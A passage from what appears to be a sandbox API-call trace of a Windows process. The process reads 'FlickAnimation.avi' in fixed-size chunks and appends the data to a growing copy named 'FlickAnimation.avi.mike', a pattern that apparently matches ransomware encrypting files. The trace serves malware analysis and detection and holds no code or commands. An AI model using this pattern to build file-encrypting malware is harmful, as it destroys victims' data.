Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.069] GetFileType (hFile=0x264) returned 0x1 [0043.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.069] GetFileType (hFile=0x264) returned 0x1 [0043.069] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x39a20 [0043.069] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.069] GetFileType (hFile=0x264) returned 0x1 [0043.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.070] GetFileType (hFile=0x264) returned 0x1 [0043.070] SetFilePointer (in: hFile=0x264, lDistanceToMove=245760, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x3c000 [0043.070] ReadFile (in: hFile=0x264, lpBuffer=0x222d18c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x222d18c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.071] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.071] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.071] GetFileType (hFile=0x264) returned 0x1 [0043.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.071] GetFileType (hFile=0x264) returned 0x1 [0043.071] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x3c220 [0043.072] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.072] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.072] GetFileType (hFile=0x264) returned 0x1 [0043.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.072] GetFileType (hFile=0x264) returned 0x1 [0043.072] SetFilePointer (in: hFile=0x264, lDistanceToMove=256000, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x3e800 [0043.072] ReadFile (in: hFile=0x264, lpBuffer=0x223a164, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x223a164*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.074] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.074] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.074] GetFileType (hFile=0x264) returned 0x1 [0043.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.074] GetFileType (hFile=0x264) returned 0x1 [0043.074] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x3ea20 [0043.086] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.086] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.086] GetFileType (hFile=0x264) returned 0x1 [0043.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.086] GetFileType (hFile=0x264) returned 0x1 [0043.086] SetFilePointer (in: hFile=0x264, lDistanceToMove=266240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x41000 [0043.086] ReadFile (in: hFile=0x264, lpBuffer=0x224713c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x224713c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.087] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.088] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.088] GetFileType (hFile=0x264) returned 0x1 [0043.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.088] GetFileType (hFile=0x264) returned 0x1 [0043.088] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x41220 [0043.088] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.088] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.088] GetFileType (hFile=0x264) returned 0x1 [0043.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.088] GetFileType (hFile=0x264) returned 0x1 [0043.088] SetFilePointer (in: hFile=0x264, lDistanceToMove=276480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x43800 [0043.089] ReadFile (in: hFile=0x264, lpBuffer=0x2254114, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2254114*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.090] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.090] GetFileType (hFile=0x264) returned 0x1 [0043.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.090] GetFileType (hFile=0x264) returned 0x1 [0043.090] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x43a20 [0043.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.091] GetFileType (hFile=0x264) returned 0x1 [0043.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.091] GetFileType (hFile=0x264) returned 0x1 [0043.091] SetFilePointer (in: hFile=0x264, lDistanceToMove=286720, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x46000 [0043.091] ReadFile (in: hFile=0x264, lpBuffer=0x22610ec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22610ec*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.092] GetFileType (hFile=0x264) returned 0x1 [0043.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.092] GetFileType (hFile=0x264) returned 0x1 [0043.092] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x46220 [0043.093] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.093] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.093] GetFileType (hFile=0x264) returned 0x1 [0043.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.093] GetFileType (hFile=0x264) returned 0x1 [0043.093] SetFilePointer (in: hFile=0x264, lDistanceToMove=296960, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x48800 [0043.093] ReadFile (in: hFile=0x264, lpBuffer=0x226e0c4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x226e0c4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.094] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.094] GetFileType (hFile=0x264) returned 0x1 [0043.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.095] GetFileType (hFile=0x264) returned 0x1 [0043.095] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x48a20 [0043.095] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.095] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.095] GetFileType (hFile=0x264) returned 0x1 [0043.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.095] GetFileType (hFile=0x264) returned 0x1 [0043.095] SetFilePointer (in: hFile=0x264, lDistanceToMove=307200, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x4b000 [0043.095] ReadFile (in: hFile=0x264, lpBuffer=0x227b09c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x227b09c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.137] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.137] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.137] GetFileType (hFile=0x264) returned 0x1 [0043.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.137] GetFileType (hFile=0x264) returned 0x1 [0043.137] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x4b220 [0043.137] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.138] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.138] GetFileType (hFile=0x264) returned 0x1 [0043.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.138] GetFileType (hFile=0x264) returned 0x1 [0043.138] SetFilePointer (in: hFile=0x264, lDistanceToMove=317440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x4d800 [0043.138] ReadFile (in: hFile=0x264, lpBuffer=0x2288074, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2288074*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.139] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.139] GetFileType (hFile=0x264) returned 0x1 [0043.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.139] GetFileType (hFile=0x264) returned 0x1 [0043.140] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x4da20 [0043.140] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.140] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.140] GetFileType (hFile=0x264) returned 0x1 [0043.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.140] GetFileType (hFile=0x264) returned 0x1 [0043.140] SetFilePointer (in: hFile=0x264, lDistanceToMove=327680, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x50000 [0043.140] ReadFile (in: hFile=0x264, lpBuffer=0x229504c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x229504c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.142] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.142] GetFileType (hFile=0x264) returned 0x1 [0043.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.142] GetFileType (hFile=0x264) returned 0x1 [0043.142] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x50220 [0043.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.142] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.143] GetFileType (hFile=0x264) returned 0x1 [0043.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.143] GetFileType (hFile=0x264) returned 0x1 [0043.143] SetFilePointer (in: hFile=0x264, lDistanceToMove=337920, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x52800 [0043.143] ReadFile (in: hFile=0x264, lpBuffer=0x22a2024, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22a2024*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.144] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.144] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.144] GetFileType (hFile=0x264) returned 0x1 [0043.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.144] GetFileType (hFile=0x264) returned 0x1 [0043.144] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x52a20 [0043.145] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 